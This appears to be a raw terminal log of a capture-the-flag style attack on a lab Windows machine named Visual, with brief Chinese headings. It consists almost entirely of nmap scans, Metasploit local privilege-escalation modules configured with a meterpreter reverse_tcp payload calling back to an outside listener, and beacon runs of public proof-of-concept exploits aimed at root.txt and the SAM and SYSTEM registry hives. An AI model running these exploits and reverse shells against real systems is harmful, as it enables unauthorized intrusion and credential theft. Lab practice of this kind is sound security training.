kali@kali ~/D/H/M/Visual> nmap -p- -n --min-rate 3000 -T4 10.10.11.234 Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-2523:44 CST Nmap scan report for 10.10.11.234 Host is up (0.26s latency). Not shown: 65534 filtered tcp ports (no-response) PORT STATE SERVICE 80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 78.79 seconds kali@kali ~/D/H/M/Visual> sudo nmap -Pn -p- -n --min-rate 3000 -T4 -sU 10.10.11.234 Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-2523:46 CST Nmap scan report for 10.10.11.234 Host is up. All65535 scanned ports on10.10.11.234 are in ignored states. Not shown: 65535 open|filtered udp ports (no-response)
Nmap done: 1 IP address (1 host up) scanned in 44.60 seconds
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.11.234 - Collecting local exploits for x64/windows... [*] 10.10.11.234 - 189 exploit checks are being tried... [+] 10.10.11.234 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable. [+] 10.10.11.234 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable. [+] 10.10.11.234 - exploit/windows/local/bypassuac_sluihijack: The target appears to be vulnerable. [+] 10.10.11.234 - exploit/windows/local/cve_2020_1048_printerdemon: The target appears to be vulnerable. [+] 10.10.11.234 - exploit/windows/local/cve_2020_1337_printerdemon: The target appears to be vulnerable. [+] 10.10.11.234 - exploit/windows/local/cve_2022_21882_win32k: The target appears to be vulnerable. [+] 10.10.11.234 - exploit/windows/local/cve_2022_21999_spoolfool_privesc: The target appears to be vulnerable. [+] 10.10.11.234 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated. [*] Running check method for exploit 45 / 45 [*] 10.10.11.234 - Valid modules for session 2:
尝试提权记录
msf6 exploit(windows/local/cve_2020_1337_printerdemon) > run
[*] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. [*] Attempting to PrivEsc on VISUAL via session ID: 2 [-] Exploit aborted due to failure: bad-config: Payload arch must match target arch msf6 exploit(windows/local/cve_2020_1337_printerdemon) > set -g payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf6 exploit(windows/local/cve_2020_1337_printerdemon) > run
[*] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. [*] Attempting to PrivEsc on VISUAL via session ID: 2 [*] Running Exploit on VISUAL msf6 exploit(windows/local/cve_2020_1337_printerdemon) > use exploit/windows/local/cve_2022_21882_win32k [*] Using configured payload windows/x64/meterpreter/reverse_tcp msf6 exploit(windows/local/cve_2022_21882_win32k) > run
[*] Started reverse TCP handler on 10.10.14.46:4444 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. [*] Launching msiexec to host the DLL... [+] Process 1732 launched. [*] Reflectively injecting the DLL into 1732... [+] Exploit finished, waitfor (hopefully privileged) payload execution to complete. [*] Exploit completed, but no session was created. msf6 exploit(windows/local/cve_2022_21882_win32k) > use exploit/windows/local/cve_2022_21999_spoolfool_privesc [*] Using configured payload windows/x64/meterpreter/reverse_tcp msf6 exploit(windows/local/cve_2022_21999_spoolfool_privesc) > run
[*] Started reverse TCP handler on 10.10.14.46:4444 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. [-] Exploit failed [user-interrupt]: Rex::TimeoutError Send timed out [-] run: Interrupted msf6 exploit(windows/local/cve_2022_21999_spoolfool_privesc) > run
[*] Started reverse TCP handler on 10.10.14.46:4444 [*] Running automatic check ("set AutoCheck false" to disable) [-] Exploit failed [user-interrupt]: Rex::TimeoutError Send timed out [-] run: Interrupted msf6 exploit(windows/local/cve_2022_21999_spoolfool_privesc) > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc [*] Using configured payload windows/x64/meterpreter/reverse_tcp msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > run
winpeas 尝试记录
winpeas给出的可能漏洞
[?] Windows vulns search powered by Watson(https://github.com/rasta-mouse/Watson) [*] OS Version: 1809 (17763) [*] Enumerating installed KBs... [!] CVE-2019-0836 : VULNERABLE [>] https://exploit-db.com/exploits/46718 [>] https://decoder.cloud/2019/04/29/combinig-luafv-postluafvpostreadwrite-race-condition-pe-with-diaghub-collector-exploit-from-standard-user-to-system/
[?] Windows vulns search powered by Watson(https://github.com/rasta-mouse/Watson) [*] OS Version: 1809 (17763) [*] Enumerating installed KBs... [!] CVE-2019-0836 : VULNERABLE [>] https://exploit-db.com/exploits/46718 [>] https://decoder.cloud/2019/04/29/combinig-luafv-postluafvpostreadwrite-race-condition-pe-with-diaghub-collector-exploit-from-standard-user-to-system/
beacon> run C:\Users\enox\desktop\PoC_LUAFV_PostReadWriteCallback_EoP.exe [*] Tasked beacon to run: C:\Users\enox\desktop\PoC_LUAFV_PostReadWriteCallback_EoP.exe [+] host called home, sent: 79 bytes [+] received output: Base Path: C:\ProgramData\luafv_c9f12450-7f23-467a-a039-cab4009e1a9a Trying to map C:\Windows\system32\license.rtf R/W NtApiDotNet.NtException: (0xC0000022) - {Access Denied} A process has requested access to an object, but has not been granted those access rights. at NtApiDotNet.NtObjectUtils.ToNtException(NtStatus status, Boolean throw_on_error) at NtApiDotNet.NtFile.DoLinkRename(FileInformationClass file_info, String linkname, NtFile root, Boolean replace_if_exists) at NtApiDotNet.NtFile.CreateHardlink(String path, String linkname) at PoC_LUAFV_PostReadWriteCallback_EoP.Program.RemapFileAsRW() at PoC_LUAFV_PostReadWriteCallback_EoP.Program.Main(String[] args)
beacon> run C:\Users\enox\desktop\CVE_2019-0841.exe [*] Tasked beacon to run: C:\Users\enox\desktop\CVE_2019-0841.exe [+] host called home, sent: 57 bytes [+] received output: # Privileged DACL Overwrite EoP # CVE: CVE-2019-0841 # Exploit Author: Nabeel Ahmed (@rogue_kdc) # Tested on: Microsoft Windows 10 x32 & x64 # Category: Local ------------------------------------------------- [+] Usage: exploit.exe <path to file to takeover> [+] (E.g., exploit.exe C:\Windows\win.ini -------------------------------------------------
beacon> run C:\Users\enox\desktop\CVE_2019-0841.exe C:\Users\Administrator\Desktop\root.txt [*] Tasked beacon to run: C:\Users\enox\desktop\CVE_2019-0841.exe C:\Users\Administrator\Desktop\root.txt [+] host called home, sent: 97 bytes [+] received output: [+] You don't have 'Modify/Write' privileges on this file ... beacon> run C:\Users\enox\desktop\CVE_2019-0841.exe C:\Users\Administrator\ [*] Tasked beacon to run: C:\Users\enox\desktop\CVE_2019-0841.exe C:\Users\Administrator\ [+] host called home, sent: 81 bytes [+] received output: [+] Something went wrong: No such file or directory beacon> run C:\Users\enox\desktop\CVE_2019-0841.exe C:\Users\Administrator\Desktop\root.txt [*] Tasked beacon to run: C:\Users\enox\desktop\CVE_2019-0841.exe C:\Users\Administrator\Desktop\root.txt [+] host called home, sent: 97 bytes [+] received output: [+] You don't have 'Modify/Write' privileges on this file ...
beacon> run C:\Users\enox\Desktop\CVE_2019-0841.exe C:\Windows\System32\config\sam [*] Tasked beacon to run: C:\Users\enox\Desktop\CVE_2019-0841.exe C:\Windows\System32\config\sam [+] host called home, sent: 88 bytes [+] received output: [+] You don't have 'Modify/Write' privileges on this file ... beacon> run C:\Users\enox\Desktop\CVE_2019-0841.exe C:\Windows\System32\config\system [*] Tasked beacon to run: C:\Users\enox\Desktop\CVE_2019-0841.exe C:\Windows\System32\config\system [+] host called home, sent: 91 bytes [+] received output: [+] You don't have 'Modify/Write' privileges on this file ...
beacon> run C:\Users\enox\desktop\AppXSVC_poc_x64.exe C:\Users\Administrator\ [*] Tasked beacon to run: C:\Users\enox\desktop\AppXSVC_poc_x64.exe C:\Users\Administrator\ [+] host called home, sent: 83 bytes [+] received output: [+] C:\Users\Administrator\ not found
beacon> run C:\Users\enox\desktop\AppXSVC_poc_x64.exe C:\Windows\System32\config\system [*] Tasked beacon to run: C:\Users\enox\desktop\AppXSVC_poc_x64.exe C:\Windows\System32\config\system [+] host called home, sent: 93 bytes [+] received output: [+] C:\Windows\System32\config\system not found
beacon> run C:\Users\enox\desktop\AppXSVC_poc_x64.exe C:\Windows\System32\config\sam [*] Tasked beacon to run: C:\Users\enox\desktop\AppXSVC_poc_x64.exe C:\Windows\System32\config\sam [+] host called home, sent: 90 bytes [+] received output: [+] C:\Windows\System32\config\sam not found
PS C:\Users\enox\Desktop> .\MsiExploit.exe C:\Users\Administrator\ .\MsiExploit.exe C:\Users\Administrator\ The Windows Installer Service could not be accessed. This can occur if the Windows Installer is not correctly installed. Contact your support personnel for assistance. The Windows Installer Service could not be accessed. This can occur if the Windows Installer is not correctly installed. Contact your support personnel for assistance. This action is only valid for products that are currently installed.